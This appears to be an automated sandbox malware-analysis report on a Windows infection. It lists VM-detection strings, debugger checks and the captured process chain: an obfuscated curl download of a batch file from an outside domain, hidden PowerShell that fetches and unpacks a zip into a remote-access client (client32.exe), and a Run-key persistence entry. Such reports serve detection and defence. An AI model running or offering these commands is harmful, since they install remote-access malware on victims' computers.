Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processorsys
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB182000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DHyper-V Hypervisor Root PartitionPt
Source: explorer.exe, 00000016.00000000.1609515483.0000000008970000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}UE
Source: chrome.exe, 00000000.00000002.2431215679.000001E4A7538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll./
Source: explorer.exe, 00000016.00000000.1609515483.0000000008970000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000016.00000002.2412632825.0000000000A76000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: JHyper-V Hypervisor Logical Processord-
Source: explorer.exe, 00000016.00000003.2250792493.0000000006ED5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Prod_VMware_SATA
Source: chrome.exe, 00000000.00000002.2487145456.000028EC03B10000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware Virtual USB Mouse
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V rytllcpqlndyltx Bus
Source: chrome.exe, 00000000.00000002.2431215679.000001E4A7538000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X2Hyper-V VM Vid Partition
Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: chrome.exe, 00000000.00000003.2329710109.000028EC0418C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 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
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: sWDHyper-V Hypervisor Root Partition
Source: powershell.exe, 00000022.00000002.1908768239.0000028FCF048000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: chrome.exe, 00000000.00000003.1816401838.000028EC02578000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware20,1(
Source: chrome.exe, 00000000.00000002.2496886639.000028EC04A69000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: HRpgw3pr2zx+zbfu3OWBb9XAtv9LdoBbGVGm+zuRWG0wfuaDwOM2rYHCpZ+VSLQiZ9D5bX3p2VMrnbgVKEoWkTWrk8fyZTrHYPBRUU8EDhy8lenDZgCZtDSJGoEBdAEFxDOYT7W0Cw2AR6H02PyDCsZ2VFnceeJ0fFcF5Hoj/QMQlrN27uj7H5QHmTsInWJHfccNk2UVK6ETXqx+fdfNSxrnavEgpatDDx1vMATx0pCTzdHAItQFwoJ4cX94Z1prk0k+HpyVm3aW08aZW+VdqhNN+vsWzPCPAZZiE+fIi5eBDITLPIqrb9t1Md7ubrDqYycWRQQEmUF3jfcGwlMekRkl4Nkl85RqJee2muJQiwEIH+CDK+CzCQ2lrnDQ+hqUEluKLkhMz/7hXiIJOEgIHJQr1dxUIlz91kJWh4Iul7davpjQd6IIt3Mnp2hR0rWDz8+ZWTQCQ13U1oC65XnbDZTswiB8vjvmkYT+8HoP9rS6/mSXC7IXx91zlvVDeDh5/4tPIhtV6Q82PUl0Fyip2ILK+/PPoDVwBOpchDpnju0DW2PsnB4LisW1WEZ7b9F7/ksGBLPhmHhXSvuEQsRLqA92KUS2+r0geo8whVNHZ+EX8kf7Art9UMoe80ec0yf0NprcvqXdzoDGw1Gzeg1YtYNHX3xcxZbamGgk5xOFGc6Qex03G7MvVG8jYjbrGBHp1x9oGHnpiTMFGBfIhxTopUNS2KcQ/8xpnypBymD/H0WS8s8jn8o0X35mivo8vtDTA95pr1nv3cNo78wP5ZSptCaYgADoG6o6h5Vwet6Pd/5nX/rH6XQg6m+h/O4unCB2pXHaxwj04cNjXCdcov4MMzMH7RgKKLn6ioKjztll35sUSyQaCW0hCYwgcFP1reCIB8x+p02ZSk66Kgk9yTZHb+SjgrPBwBSvp6O9TW0fhwfHHFu6ne6tKeE35QZfw0/Qsh8JNEBQZ9e9U7523ZknUEXDNab3atftuqwYudixqH6wUBDo1vTzxubK2wG+wvSldRddbcyoxLd651Sut6692sQsO6Ym59DVJG42S23BSF0sLYGKXMRsRc9rq9wpAmLb9P/k//ZBTB6Qd0plKhs3fekACyDEcikLaY9reD3c6DzT6L7O8FKTmNcxGhJ/9En4y6dRVdXUZw2JiFSikE9ruEQblbsveqBkNkLbh9/zKVTS6S7qy3CyNDSwvG8gkUoVn9Lfde0RhqMelaURaTIe0l9U4AP6SUWS4a4fUoL1sDcTd/OZbyGA\\u003d\\u003d\\\",\\\"interpreterSafeUrl\\\":{\\\"privateDoNotAccessOrElseTrustedResourceUrlWrappedValue\\\":\\\"//www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js\\\"},\\\"serverEnvironment\\\":1}}},\\\"videoFlags\\\":{\\\"playableInEmbed\\\":true,\\\"isCrawlable\\\":true},\\\"previewPlayabilityStatus\\\":{\\\"status\\\":\\\"OK\\\",\\\"playableInEmbed\\\":true,\\\"contextParams\\\":\\\"Q0FJU0FnZ0E\\u003d\\\"},\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFTPLYxSer_R5PwkmZS-Tw4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"h15NcT6UXh0\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"h15NcT6UXh0\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTR","inline":true,"dynamic":false}
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VHyper-V Dynamic Memory Integration ServiceS
Source: explorer.exe, 00000016.00000000.1599850643.00000000009A9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000}
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB199000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: &Hyper-V HypervisorsY^
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: &Hyper-V Hypervisorr.
Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: curl.exe, 0000001E.00000003.1778104266.000001366F8D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Root Partition*+h
Source: explorer.exe, 00000016.00000000.1609515483.00000000086D5000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Virtual Machine Bus Pipesl
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: explorer.exe, 00000016.00000000.1609515483.00000000087E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Dynamic Memory Integration ServiceA
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: NXTVMWare
Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: client32.exe, 00000025.00000002.2432223673.000000006CCC0000.00000002.00000001.01000000.00000014.sdmp Binary or memory string: VMWare
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V Hypervisor Logical Processorc.sys
Source: explorer.exe, 00000016.00000000.1600834236.0000000002D50000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware, Inc.VMW201.00V.21805430.B64.230522183005/22/2023
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB1CF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: 2Hyper-V VM Vid Partitionll;
Source: chrome.exe, 00000000.00000002.2436349685.000001E4AB199000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V VM Vid PartitionllEQ
Source: explorer.exe, 00000016.00000000.1609515483.00000000087E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation Counter
Source: chrome.exe, 00000000.00000002.2485928305.000028EC0389C000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=1292e4ad-0700-4406-abe9-f5f1f5a6abb7
Source: C:\Users\user\AppData\Roaming\Options\client32.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\Options\client32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 37_2_11161D01
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState, 37_2_11147750
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11145440 _memset,GetVersionExA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDefaultLangID, 37_2_11145440
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1108BF30 GetTokenInformation,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,IsValidSid,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 37_2_1108BF30
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle, 37_2_11093080
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter, 37_2_110310C0
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 37_2_11161D01
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 37_2_1116DD89
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CCA28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 37_2_6CCA28E1
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_6CCA87F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 37_2_6CCA87F5
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError, 37_2_110F4560
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event, 37_2_1111FCA0
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c cmd.exe /c c^ur^l.ex^e -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat && start /min "" C:\ProgramData\win.bat Visitor press Enter Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\win.bat Visitor press Enter Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl.exe -k -Ss -X POST https://lang3666.top/lv/ddas.php -o C:\ProgramData\win.bat Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri 'https://windomstatetheater.com/mits.zip?4d1bb1c81cf13e2af696' -OutFile 'C:\Users\user\AppData\Roaming\Application.zip'" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-Type -AssemblyName 'System.IO.Compression.FileSystem'; [IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\user\AppData\Roaming\Application.zip', 'C:\Users\user\AppData\Roaming\Options')" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Options\client32.exe "C:\Users\user\AppData\Roaming\Options\client32.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "Support11" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Options\client32.exe" /f Jump to behavior
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent, 37_2_1109E190
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 37_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid, 37_2_1109E910
Source: explorer.exe, 00000016.00000002.2421946615.0000000000F60000.00000002.00000001.00040000.00000007.sdmp, explorer.exe, 00000016.00000000.1600276653.0000000000F60000.00000002.00000001.00040000.00000007.sdmp Binary or memory string: Program ManagerKO
Source: explorer.exe, 00000016.00000002.2421946615.0000000000F60000.00000002.00000001.00040000.00000007.sdmp, explorer.exe, 00000016.00000002.2431995358.00000000043D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1602122423.00000000043D0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000016.00000003.2240395779.0000000008909000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1609515483.0000000008834000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWndX
Source: explorer.exe, 00000016.00000002.2421946615.0000000000F60000.00000002.00000001.00040000.00000007.sdmp, explorer.exe, 00000016.00000000.1600276653.0000000000F60000.00000002.00000001.00040000.00000007.sdmp, client32.exe Binary or memory string: Progman
Source: explorer.exe, 00000016.00000000.1599850643.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2412632825.00000000009AD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: +Progman
Source: explorer.exe, 00000016.00000002.2421946615.0000000000F60000.00000002.00000001.00040000.00000007.sdmp, explorer.exe, 00000016.00000000.1600276653.0000000000F60000.00000002.00000001.00040000.00000007.sdmp Binary or memory string: Progmanlock
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 37_2_11173A35
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 37_2_11173D69
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 37_2_11173CC6
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: GetLocaleInfoA, 37_2_1116B38E
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 37_2_11173933
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 37_2_111739DA
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 37_2_1117383E
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 37_2_11173D2D
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 37_2_11173C06
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 37_2_6CCB0F39
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 37_2_6CCB2089
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 37_2_6CCB21DC
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: EnumSystemLocalesA, 37_2_6CCB2151
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 37_2_6CCB2175
Source: C:\Users\user\AppData\Roaming\Options\client32.exe Code function: 